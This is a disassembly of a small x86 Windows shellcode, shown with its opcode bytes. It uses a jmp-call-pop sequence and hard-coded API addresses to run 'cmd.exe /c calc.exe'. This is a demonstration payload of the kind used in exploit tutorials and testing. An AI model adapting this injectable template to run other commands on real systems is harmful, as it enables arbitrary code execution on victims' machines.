0x0        jmp 0x1d                            \xeb\x1b                  ..        

     label_0x2:
0x2        pop ebx                             \x5b                      [         
0x3        xor eax, eax                        \x31\xc0                  1.        
0x5        push eax                            \x50                      P         
0x6        xor eax, eax                        \x31\xc0                  1.        
0x8        mov byte ptr [ebx + 0x13], al       \x88\x43\x13              .C.       
0xb        push ebx                            \x53                      S         
0xc        mov ebx, 0x7c8623ad                 \xbb\xad\x23\x86\x7c      ..#.|     
0x11       call ebx                            \xff\xd3                  ..        
0x13       xor eax, eax                        \x31\xc0                  1.        
0x15       push eax                            \x50                      P         
0x16       mov ebx, 0x7c81cafa                 \xbb\xfa\xca\x81\x7c      ....|     
0x1b       call ebx                            \xff\xd3                  ..        
     label_0x1d:
0x1d       call 2                              \xe8\xe0\xff\xff\xff      .....     
0x22       cmd.exe /c calc.exe ; string       \x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x63\x61\x6c\x63\x2e\x65\x78\x65          
